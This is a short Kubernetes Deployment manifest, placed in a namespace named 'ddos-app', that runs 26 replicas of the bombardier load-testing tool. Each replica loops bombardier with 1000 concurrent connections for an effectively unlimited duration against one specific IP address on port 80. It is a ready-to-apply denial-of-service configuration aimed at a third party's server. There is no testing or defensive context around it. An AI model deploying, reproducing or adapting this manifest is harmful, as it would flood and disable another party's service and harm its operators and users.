apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: 185.165.123.22880
  name: 185.165.123.22880
  namespace: ddos-app
spec:
  replicas: 26
  selector:
    matchLabels:
      app: 185.165.123.22880
  template:
    metadata:
      labels:
        app: 185.165.123.22880
    spec:
      containers:
      - name: bombardier
        image: alpine/bombardier
        imagePullPolicy: IfNotPresent
        command: ["/bin/sh"]
        args: ["-c", "for run in $(seq 1 100000); do bombardier -c 1000 -d 200000h -r 10 -p i,p,r 185.165.123.228:80; done"]
